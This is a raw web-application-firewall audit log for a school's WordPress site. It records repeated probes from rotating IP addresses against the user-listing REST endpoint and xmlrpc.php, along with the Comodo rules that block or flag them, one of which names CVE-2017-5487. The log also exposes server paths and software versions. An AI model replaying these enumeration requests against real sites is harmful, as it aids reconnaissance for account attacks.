"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427686937011 3408 (- - -) Stopwatch2: 1747427686937011 3408; combined=1360, p1=488, p2=842, p3=0, p4=0, p5=30, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbe19b08-Z-- --1e9b236c-A-- [17/May/2025:03:34:53 +0700] aCehbHyxdQCiyU1ENFchVwAAAAw 103.236.140.4 55322 103.236.140.4 8181 --1e9b236c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1e9b236c-C-- demo.sayHello --1e9b236c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e9b236c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427692997453 7086 (- - -) Stopwatch2: 1747427692997453 7086; combined=5123, p1=714, p2=4119, p3=41, p4=43, p5=119, sr=130, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e9b236c-Z-- --3a557016-A-- [17/May/2025:03:34:53 +0700] aCehbXyxdQCiyU1ENFchWAAAAA0 103.236.140.4 55324 103.236.140.4 8181 --3a557016-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.243 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a557016-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a557016-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427693455124 3001 (- - -) Stopwatch2: 1747427693455124 3001; combined=1257, p1=444, p2=785, p3=0, p4=0, p5=28, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a557016-Z-- --7a28ac05-A-- [17/May/2025:03:35:00 +0700] aCehdATOsBn9MSWb6WJpxQAAAIE 103.236.140.4 55328 103.236.140.4 8181 --7a28ac05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.243 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.243 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7a28ac05-C-- demo.sayHello --7a28ac05-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a28ac05-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427700363948 3222 (- - -) Stopwatch2: 1747427700363948 3222; combined=2478, p1=321, p2=2011, p3=19, p4=16, p5=64, sr=46, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a28ac05-Z-- --863a5b5f-A-- [17/May/2025:03:35:11 +0700] aCehfwTOsBn9MSWb6WJpxgAAAIA 103.236.140.4 55334 103.236.140.4 8181 --863a5b5f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.32 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --863a5b5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --863a5b5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427711660454 3011 (- - -) Stopwatch2: 1747427711660454 3011; combined=1308, p1=445, p2=833, p3=0, p4=0, p5=30, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --863a5b5f-Z-- --4b5e8b0f-A-- [17/May/2025:03:35:19 +0700] aCehhgTOsBn9MSWb6WJpyAAAAIQ 103.236.140.4 55342 103.236.140.4 8181 --4b5e8b0f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.45.32 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.45.32 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4b5e8b0f-C-- demo.sayHello --4b5e8b0f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b5e8b0f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427718999158 6132 (- - -) Stopwatch2: 1747427718999158 6132; combined=4318, p1=602, p2=3557, p3=22, p4=24, p5=66, sr=87, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b5e8b0f-Z-- --bcfa8b4d-A-- [17/May/2025:03:35:57 +0700] aCehrXyxdQCiyU1ENFchXQAAABc 103.236.140.4 55348 103.236.140.4 8181 --bcfa8b4d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bcfa8b4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcfa8b4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427757180344 14894 (- - -) Stopwatch2: 1747427757180344 14894; combined=26052, p1=338, p2=694, p3=0, p4=0, p5=12523, sr=68, sw=0, l=0, gc=12497 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcfa8b4d-Z-- --1ad36606-A-- [17/May/2025:03:36:03 +0700] aCehs3yxdQCiyU1ENFchXwAAAAA 103.236.140.4 55352 103.236.140.4 8181 --1ad36606-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.251 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.251 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1ad36606-C-- demo.sayHello --1ad36606-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ad36606-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427763523367 6466 (- - -) Stopwatch2: 1747427763523367 6466; combined=4679, p1=600, p2=3889, p3=44, p4=35, p5=67, sr=77, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad36606-Z-- --1050ed42-A-- [17/May/2025:03:38:05 +0700] aCeiLXyxdQCiyU1ENFchYgAAAAU 103.236.140.4 55360 103.236.140.4 8181 --1050ed42-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1050ed42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1050ed42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747427885509194 2749 (- - -) Stopwatch2: 1747427885509194 2749; combined=1219, p1=416, p2=774, p3=0, p4=0, p5=28, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1050ed42-Z-- --108c060b-A-- [17/May/2025:03:38:10 +0700] aCeiMnyxdQCiyU1ENFchZAAAAAg 103.236.140.4 55364 103.236.140.4 8181 --108c060b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.70 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --108c060b-C-- demo.sayHello --108c060b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --108c060b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747427890189155 5566 (- - -) Stopwatch2: 1747427890189155 5566; combined=4132, p1=529, p2=3383, p3=29, p4=30, p5=97, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --108c060b-Z-- --38f6522e-A-- [17/May/2025:03:40:53 +0700] aCei1XyxdQCiyU1ENFchaQAAAA8 103.236.140.4 55378 103.236.140.4 8181 --38f6522e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --38f6522e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38f6522e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428053169617 2243 (- - -) Stopwatch2: 1747428053169617 2243; combined=1195, p1=392, p2=774, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38f6522e-Z-- --87112c43-A-- [17/May/2025:03:40:58 +0700] aCei2nyxdQCiyU1ENFchawAAABU 103.236.140.4 55382 103.236.140.4 8181 --87112c43-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.219 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --87112c43-C-- demo.sayHello --87112c43-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --87112c43-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428058560404 5795 (- - -) Stopwatch2: 1747428058560404 5795; combined=4196, p1=543, p2=3435, p3=31, p4=35, p5=91, sr=76, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --87112c43-Z-- --e68f2909-A-- [17/May/2025:03:41:00 +0700] aCei3HyxdQCiyU1ENFchbAAAABY 103.236.140.4 55384 103.236.140.4 8181 --e68f2909-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.95 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e68f2909-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e68f2909-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428060459251 2084 (- - -) Stopwatch2: 1747428060459251 2084; combined=903, p1=293, p2=574, p3=0, p4=0, p5=36, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e68f2909-Z-- --7581b110-A-- [17/May/2025:03:41:08 +0700] aCei5HyxdQCiyU1ENFchbwAAAAA 103.236.140.4 55390 103.236.140.4 8181 --7581b110-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.95 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7581b110-C-- demo.sayHello --7581b110-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7581b110-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428068128982 4728 (- - -) Stopwatch2: 1747428068128982 4728; combined=3445, p1=499, p2=2764, p3=27, p4=27, p5=76, sr=83, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7581b110-Z-- --b72f3904-A-- [17/May/2025:03:42:29 +0700] aCejNXyxdQCiyU1ENFchdAAAAAw 103.236.140.4 55408 103.236.140.4 8181 --b72f3904-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b72f3904-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b72f3904-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428149729908 3255 (- - -) Stopwatch2: 1747428149729908 3255; combined=1460, p1=512, p2=916, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b72f3904-Z-- --d102a00a-A-- [17/May/2025:03:42:35 +0700] aCejO3yxdQCiyU1ENFchdgAAAA4 103.236.140.4 55412 103.236.140.4 8181 --d102a00a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.78 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d102a00a-C-- demo.sayHello --d102a00a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d102a00a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428155866044 5758 (- - -) Stopwatch2: 1747428155866044 5758; combined=4228, p1=538, p2=3450, p3=34, p4=33, p5=101, sr=77, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d102a00a-Z-- --3b68711f-A-- [17/May/2025:03:46:29 +0700] aCekJXyxdQCiyU1ENFchfwAAAAU 103.236.140.4 55434 103.236.140.4 8181 --3b68711f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b68711f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b68711f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428389200644 2740 (- - -) Stopwatch2: 1747428389200644 2740; combined=1223, p1=419, p2=776, p3=0, p4=0, p5=28, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
